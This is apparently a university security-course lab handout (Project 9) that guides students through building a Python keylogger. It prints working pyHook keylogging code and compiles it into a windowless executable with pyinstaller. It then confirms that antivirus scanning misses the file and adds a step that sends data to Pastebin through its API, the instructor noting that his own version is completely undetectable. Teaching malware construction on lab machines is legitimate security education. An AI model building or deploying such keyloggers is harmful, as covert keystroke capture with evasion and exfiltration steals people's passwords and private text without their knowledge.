ONLY RUN THIS ON YOUR OWN TEST SYSTEMS
It's OK to run it in SCIE 214, of course, but NOT on other machines on campus.
I don't know what's wrong with the antivirus companies. It should NOT be this easy to defeat them.
If not, install Python, PyWin32, and pip as explained in Project 8.
http://go.microsoft.com/?linkid=7729279
Download and run the vcsetup.exe file.
Click Next.
Accept the license terms and click Next.
Uncheck "Silverlight" and "Microsoft SQL Server".
Click Next, Install.
Wait while software downloads and installs, as shown below:
Restart your computer if you are prompted to.
Troubleshooting
If you see a message saying 'You must use "Turn Windows features on or off" in the Control Panel to install or configure Microsoft .NET Framework 3.5 SP1.", click OK. Continue and exit the Visual Studio C++ Express installer. It will say it failed.Click Start, "Control Panel".
Click Programs.
Click "Turn Windows features on or off".
Click the check box next to "Microsoft .NET Framework 3.5.1". Click OK.
Double-click the vcsetup.exe file and run the installation again.
http://www.swig.org/download.html
In the sentence starting with "Windows users should download...", click the swigwin-3.0.0 link.
Save the swigwin-3.0.0.zip file on your desktop.
Right-click it, and click "Extract All...", Extract.
On your desktop, double-click the swigwin-3.0.0 folder.
Double-click the swigwin-3.0.0 subfolder.
Right-click the swig.exe file and click Copy.
Navigate to the C:\Windows\System32 folder, right-click an empty portion of the window, and click Paste.
If a box pops up saying "You'll need to provide Administrator permission...", click Continue.
In the Search box, type pip-win.
It may take several seconds to find it, but when it does, pip-Win_1.6.exe should appear. Click it.
In the Command field enter
venv pyi-env-name
Click Run
A Command Prompt opens with a prompt beginning with
<pyi-env-name>
http://sourceforge.net/projects/pyhook/files/
Click the "Download pyHook-1.5.1.zip (13.9 kB)" link.
Save the file on your desktop.
Right-click it, and click "Extract All...", Extract.
In the Command Prompt, at the "<pyi-env-name> C:\Users\Administrator" prompt, execute these commands (you may need to change the path to get to the desktop on your system):
set SWIG_LIB=C:\Users\Administrator\Desktop\swigwin-3.0.0\swigwin-3.0.0\Lib
cd C:\Users\Administrator\Desktop
cd pyHook-1.5.1\pyHook-1.5.1
setup.py install
A successful install looks like this:
import pythoncom, pyHook, sys, logging
LOG_FILENAME = 'YOURNAME-keylog.txt'
def OnKeyboardEvent(event):
logging.basicConfig(filename=LOG_FILENAME,
level=logging.DEBUG,
format='%(message)s')
print "Key: ", chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
Replace "YOURNAME" with your own name.
Save it as YOURNAME-keylog.py on your Desktop. When saving, use "Save as type" of "All Files" to prevent Notepad from adding a ".txt" file extension.
In the Command Prompt, at the "<pyi-env-name> C:\Users\Administrator" prompt, execute these commands:
cd C:\Users\Administrator\Desktop
YOURNAME-keylog.py
Open Notepad and type in your name.
You should see the keypresses being captured, as shown below:
Click on the host system's taskbar, at the bottom of the screen.
Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.
Save the image as "Proj 9a from YOUR NAME".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
Close the Command Prompt.
In the "Pip-Win_1.6" box, click Run.
cd C:\Users\Administrator\Desktop
pyinstaller --onefile --noconsole YOURNAME-keylog.py
A folder named "Dist" should now be present
on your
desktop. Double-click the Dist folder.
You should see your executable keylogger, named "YOURNAME-keylog.exe".
No window opens.
Right-click the taskbar and click "Task Manager. On the Processes tab, you can see the keylogger running, as shown below.
Open Notepad and type in your name again.
A file named "YOURNAME-keylog.txt" appears in the Dist folder, as shown below.
Double-click the YOURNAME-keylog.txt file. Your name should be visible, as shown below.
Click on the host system's taskbar, at the bottom of the screen.
Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.
Save the image as "Proj 9b from YOUR NAME".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
Click the "Choose File" button.
Browse to your "YOURNAME-keylog.exe" file and double-click it.
Click the "Scan It!" button.
Your file should be essentially undetectable now, as shown below.
Click on the host system's taskbar, at the bottom of the screen.
Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.
Save the image as "Proj 9c from YOUR NAME".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
At the upper right, click the "sign up" link. Create an account. For an email account, I recommend using this service:
Open the email from pastebin and click the link in it to activate your account.
In the Pastebin window, logged in to your account, at the top right, click the api link. Read the "Your Unique Developer API Key" and "Creating a New Paste" sections.
Write a Python script that will post your initials on Pastebin. I recommend using your initials rather than your whole name because I don't know any way to delete the text once it gets posted this way.
I recommend reviewing "Proj 5: HTTP Scanning with Python".
When you get it working, capture these two images:
A Wireshark capture of the TCP stream showing that it worked, and returned a URL to the pastebin post:
An image of the Web page showing your initials pasted to Pastebin:
When you get it working, capture these two images:
A Wireshark capture of the TCP stream showing that it worked, and returned a URL to the pastebin post:
An image of the Web page showing your initials pasted to Pastebin:
You don't need to compile this into an EXE or test it at VirusTotal, but I did, and it is completely undetectable:
http://www.daniweb.com/software-development/python/threads/229564/python-keylogger